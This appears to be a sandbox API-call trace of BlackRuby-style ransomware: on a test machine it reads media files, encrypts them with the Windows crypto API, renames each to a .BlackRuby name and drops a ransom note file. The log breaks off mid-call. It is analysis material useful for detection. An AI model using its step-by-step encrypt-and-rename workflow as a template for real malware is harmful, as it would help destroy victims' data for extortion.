[0056.815] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4", lpFilePart=0x0) returned 0x32 [0056.816] GetLastError () returned 0x5 [0056.816] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4", lpFilePart=0x0) returned 0x32 [0056.816] GetLastError () returned 0x5 [0056.816] SetErrorMode (uMode=0x1) returned 0x0 [0056.816] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\w7xg7.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.816] GetLastError () returned 0x0 [0056.816] GetFileType (hFile=0x184) returned 0x1 [0056.816] SetErrorMode (uMode=0x0) returned 0x1 [0056.816] GetFileType (hFile=0x184) returned 0x1 [0056.816] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x9748 [0056.816] GetLastError () returned 0x0 [0056.816] ReadFile (in: hFile=0x184, lpBuffer=0x1bc1874, nNumberOfBytesToRead=0x9748, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1bc1874*, lpNumberOfBytesRead=0x18ecac*=0x9748, lpOverlapped=0x0) returned 1 [0056.817] GetLastError () returned 0x0 [0056.817] CloseHandle (hObject=0x184) returned 1 [0056.817] GetLastError () returned 0x0 [0056.817] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4", lpFilePart=0x0) returned 0x32 [0056.817] GetLastError () returned 0x0 [0056.817] SetErrorMode (uMode=0x1) returned 0x0 [0056.817] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\w7xg7.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc46d4cd0, ftCreationTime.dwHighDateTime=0x1d35a4f, ftLastAccessTime.dwLowDateTime=0x40e51d80, ftLastAccessTime.dwHighDateTime=0x1d35071, ftLastWriteTime.dwLowDateTime=0x40e51d80, ftLastWriteTime.dwHighDateTime=0x1d35071, nFileSizeHigh=0x0, nFileSizeLow=0x9748)) returned 1 [0056.817] GetLastError () returned 0x0 [0056.817] SetErrorMode (uMode=0x0) returned 0x1 [0056.828] CryptImportKey (in: hProv=0x37c708, pbData=0x1c2eab0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360aa0) returned 1 [0056.828] GetLastError () returned 0x0 [0056.828] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.828] GetLastError () returned 0x0 [0056.833] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.833] GetLastError () returned 0x0 [0056.833] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360fa0) returned 1 [0056.833] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.833] GetLastError () returned 0x0 [0056.833] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1c5bafc*=0x1, dwFlags=0x0) returned 1 [0056.833] GetLastError () returned 0x0 [0056.833] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1c5bac8, dwFlags=0x0) returned 1 [0056.833] GetLastError () returned 0x0 [0056.833] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c5bb44*, pdwDataLen=0x18ec9c*=0x9840, dwBufLen=0x9840 | out: pbData=0x1c5bb44*, pdwDataLen=0x18ec9c*=0x9840) returned 1 [0056.834] GetLastError () returned 0x0 [0056.834] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c6ebf0*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1c6ebf0*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0056.834] GetLastError () returned 0x0 [0056.834] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c6ec20*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1c6ec20*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0056.834] GetLastError () returned 0x0 [0056.834] CryptDestroyKey (hKey=0x360aa0) returned 1 [0056.834] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.834] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.834] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4", lpFilePart=0x0) returned 0x32 [0056.834] GetLastError () returned 0x0 [0056.834] SetErrorMode (uMode=0x1) returned 0x0 [0056.835] GetFileType (hFile=0x184) returned 0x1 [0056.835] SetErrorMode (uMode=0x0) returned 0x1 [0056.835] GetFileType (hFile=0x184) returned 0x1 [0056.835] WriteFile (in: hFile=0x184, lpBuffer=0x1c81cdc*, nNumberOfBytesToWrite=0x9850, lpNumberOfBytesWritten=0x18ecb8, lpOverlapped=0x0 | out: lpBuffer=0x1c81cdc*, lpNumberOfBytesWritten=0x18ecb8*=0x9850, lpOverlapped=0x0) returned 1 [0056.836] GetLastError () returned 0xb7 [0056.837] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\w7xg7.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\Encrypted_U7qF6ahgNQg2LU11Ug6fO89SzMZBJ6znpp69u5MLCnF8Fn.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\encrypted_u7qf6ahgnqg2lu11ug6fo89szmzbj6znpp69u5mlcnf8fn.blackruby")) returned 1 [0056.839] GetLastError () returned 0xb7 [0056.840] SetErrorMode (uMode=0x0) returned 0x1 [0056.840] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360aa0 [0056.840] GetLastError () returned 0x5 [0056.840] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.840] GetLastError () returned 0x5 [0056.841] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.841] GetLastError () returned 0x5 [0056.841] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.841] GetLastError () returned 0x5 [0056.841] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.841] GetLastError () returned 0x5 [0056.841] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.841] GetLastError () returned 0x5 [0056.841] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.841] GetLastError () returned 0x5 [0056.841] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.841] GetLastError () returned 0x5 [0056.841] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.841] GetLastError () returned 0x5 [0056.842] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.842] GetLastError () returned 0x5 [0056.842] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.842] GetLastError () returned 0x5 [0056.842] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.842] GetLastError () returned 0x5 [0056.842] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0056.842] GetLastError () returned 0x12 [0056.842] FindClose (in: hFindFile=0x360aa0 | out: hFindFile=0x360aa0) returned 1 [0056.842] SetErrorMode (uMode=0x0) returned 0x1 [0056.842] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9", lpFilePart=0x0) returned 0x2d [0056.842] GetLastError () returned 0x12 [0056.842] SetErrorMode (uMode=0x1) returned 0x0 [0056.842] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360aa0 [0056.843] GetLastError () returned 0x12 [0056.843] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.843] GetLastError () returned 0x12 [0056.843] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.843] GetLastError () returned 0x12 [0056.843] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.843] GetLastError () returned 0x12 [0056.843] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.843] GetLastError () returned 0x12 [0056.843] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.843] GetLastError () returned 0x12 [0056.843] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.843] GetLastError () returned 0x12 [0056.843] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.843] GetLastError () returned 0x12 [0056.844] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.844] GetLastError () returned 0x12 [0056.844] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.844] GetLastError () returned 0x12 [0056.844] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.844] GetLastError () returned 0x12 [0056.844] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.844] GetLastError () returned 0x12 [0056.844] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0056.844] GetLastError () returned 0x12 [0056.844] FindClose (in: hFindFile=0x360aa0 | out: hFindFile=0x360aa0) returned 1 [0056.844] SetErrorMode (uMode=0x0) returned 0x1 [0056.844] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi", lpFilePart=0x0) returned 0x36 [0056.845] GetLastError () returned 0x12 [0056.845] SetErrorMode (uMode=0x1) returned 0x0 [0056.845] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\brxj.avi"), fInfoLevelId=0x0, lpFileInformation=0x1caaa4c | out: lpFileInformation=0x1caaa4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d393a70, ftCreationTime.dwHighDateTime=0x1d358d8, ftLastAccessTime.dwLowDateTime=0xee1069b0, ftLastAccessTime.dwHighDateTime=0x1d34b7b, ftLastWriteTime.dwLowDateTime=0xee1069b0, ftLastWriteTime.dwHighDateTime=0x1d34b7b, nFileSizeHigh=0x0, nFileSizeLow=0x151f2)) returned 1 [0056.845] GetLastError () returned 0x12 [0056.845] SetErrorMode (uMode=0x0) returned 0x1 [0056.845] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi", lpFilePart=0x0) returned 0x36 [0056.845] GetLastError () returned 0x12 [0056.845] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi", lpFilePart=0x0) returned 0x36 [0056.845] GetLastError () returned 0x12 [0056.845] SetErrorMode (uMode=0x1) returned 0x0 [0056.845] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\brxj.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.845] GetLastError () returned 0x0 [0056.845] GetFileType (hFile=0x184) returned 0x1 [0056.845] SetErrorMode (uMode=0x0) returned 0x1 [0056.845] GetFileType (hFile=0x184) returned 0x1 [0056.845] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x151f2 [0056.845] GetLastError () returned 0x0 [0056.846] ReadFile (in: hFile=0x184, lpBuffer=0x2dd2790, nNumberOfBytesToRead=0x151f2, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x2dd2790*, lpNumberOfBytesRead=0x18ecac*=0x151f2, lpOverlapped=0x0) returned 1 [0056.847] GetLastError () returned 0x0 [0056.847] CloseHandle (hObject=0x184) returned 1 [0056.847] GetLastError () returned 0x0 [0056.848] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi", lpFilePart=0x0) returned 0x36 [0056.848] GetLastError () returned 0x0 [0056.848] SetErrorMode (uMode=0x1) returned 0x0 [0056.848] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\brxj.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d393a70, ftCreationTime.dwHighDateTime=0x1d358d8, ftLastAccessTime.dwLowDateTime=0xee1069b0, ftLastAccessTime.dwHighDateTime=0x1d34b7b, ftLastWriteTime.dwLowDateTime=0xee1069b0, ftLastWriteTime.dwHighDateTime=0x1d34b7b, nFileSizeHigh=0x0, nFileSizeLow=0x151f2)) returned 1 [0056.848] GetLastError () returned 0x0 [0056.848] SetErrorMode (uMode=0x0) returned 0x1 [0056.848] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c680) returned 1 [0056.849] GetLastError () returned 0x0 [0056.882] CryptImportKey (in: hProv=0x37c680, pbData=0x1d06780, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360ce0) returned 1 [0056.882] GetLastError () returned 0x0 [0056.882] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.882] GetLastError () returned 0x0 [0056.887] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.887] GetLastError () returned 0x0 [0056.887] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360da0) returned 1 [0056.887] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.887] GetLastError () returned 0x0 [0056.887] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1d337cc*=0x1, dwFlags=0x0) returned 1 [0056.887] GetLastError () returned 0x0 [0056.887] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1d33798, dwFlags=0x0) returned 1 [0056.887] GetLastError () returned 0x0 [0056.897] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2ae8450*, pdwDataLen=0x18ec9c*=0x152f0, dwBufLen=0x152f0 | out: pbData=0x2ae8450*, pdwDataLen=0x18ec9c*=0x152f0) returned 1 [0056.898] GetLastError () returned 0x0 [0056.898] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b22d90*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1b22d90*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0056.898] GetLastError () returned 0x0 [0056.898] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b22dc0*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1b22dc0*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0056.898] GetLastError () returned 0x0 [0056.899] CryptDestroyKey (hKey=0x360ce0) returned 1 [0056.899] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.899] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.899] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi", lpFilePart=0x0) returned 0x36 [0056.899] GetLastError () returned 0x0 [0056.899] SetErrorMode (uMode=0x1) returned 0x0 [0056.899] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\brxj.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.901] GetLastError () returned 0xb7 [0056.901] GetFileType (hFile=0x184) returned 0x1 [0056.901] SetErrorMode (uMode=0x0) returned 0x1 [0056.901] GetFileType (hFile=0x184) returned 0x1 [0056.902] CloseHandle (hObject=0x184) returned 1 [0056.902] GetLastError () returned 0xb7 [0056.902] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi", lpFilePart=0x0) returned 0x36 [0056.902] GetLastError () returned 0xb7 [0056.902] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_amTFATFWnGtLTBM3iW6m1MyUv2mkHXAGbeQo.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_amTFATFWnGtLTBM3iW6m1MyUv2mkHXAGbeQo.BlackRuby", lpFilePart=0x0) returned 0x66 [0056.902] GetLastError () returned 0xb7 [0056.903] SetErrorMode (uMode=0x1) returned 0x0 [0056.903] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\brxj.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d393a70, ftCreationTime.dwHighDateTime=0x1d358d8, ftLastAccessTime.dwLowDateTime=0xee1069b0, ftLastAccessTime.dwHighDateTime=0x1d34b7b, ftLastWriteTime.dwLowDateTime=0x2a1c6800, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x15300)) returned 1 [0056.903] GetLastError () returned 0xb7 [0056.903] SetErrorMode (uMode=0x0) returned 0x1 [0056.903] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\brXJ.avi" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\brxj.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_amTFATFWnGtLTBM3iW6m1MyUv2mkHXAGbeQo.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\encrypted_amtfatfwngtltbm3iw6m1myuv2mkhxagbeqo.blackruby")) returned 1 [0056.903] GetLastError () returned 0xb7 [0056.903] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0056.903] GetLastError () returned 0xb7 [0056.903] SetErrorMode (uMode=0x1) returned 0x0 [0056.903] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.904] GetLastError () returned 0x0 [0056.904] GetFileType (hFile=0x184) returned 0x1 [0056.904] SetErrorMode (uMode=0x0) returned 0x1 [0056.904] GetFileType (hFile=0x184) returned 0x1 [0056.905] CloseHandle (hObject=0x184) returned 1 [0056.905] GetLastError () returned 0x0 [0056.905] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e888, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0056.905] GetLastError () returned 0x0 [0056.905] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0056.905] GetLastError () returned 0x0 [0056.905] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png", lpFilePart=0x0) returned 0x41 [0056.905] GetLastError () returned 0x0 [0056.905] SetErrorMode (uMode=0x1) returned 0x0 [0056.905] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ctnng5blxntlkmq.png"), fInfoLevelId=0x0, lpFileInformation=0x1b3fc60 | out: lpFileInformation=0x1b3fc60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e25d5b0, ftCreationTime.dwHighDateTime=0x1d34b70, ftLastAccessTime.dwLowDateTime=0x8f98abd0, ftLastAccessTime.dwHighDateTime=0x1d351ee, ftLastWriteTime.dwLowDateTime=0x8f98abd0, ftLastWriteTime.dwHighDateTime=0x1d351ee, nFileSizeHigh=0x0, nFileSizeLow=0x5e8d)) returned 1 [0056.906] GetLastError () returned 0x0 [0056.906] SetErrorMode (uMode=0x0) returned 0x1 [0056.906] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png", lpFilePart=0x0) returned 0x41 [0056.906] GetLastError () returned 0x0 [0056.906] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png", lpFilePart=0x0) returned 0x41 [0056.906] GetLastError () returned 0x0 [0056.906] SetErrorMode (uMode=0x1) returned 0x0 [0056.906] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ctnng5blxntlkmq.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.906] GetLastError () returned 0x0 [0056.906] GetFileType (hFile=0x184) returned 0x1 [0056.906] SetErrorMode (uMode=0x0) returned 0x1 [0056.906] GetFileType (hFile=0x184) returned 0x1 [0056.906] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x5e8d [0056.906] GetLastError () returned 0x0 [0056.906] ReadFile (in: hFile=0x184, lpBuffer=0x1b41b80, nNumberOfBytesToRead=0x5e8d, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1b41b80*, lpNumberOfBytesRead=0x18ecac*=0x5e8d, lpOverlapped=0x0) returned 1 [0056.907] GetLastError () returned 0x0 [0056.907] CloseHandle 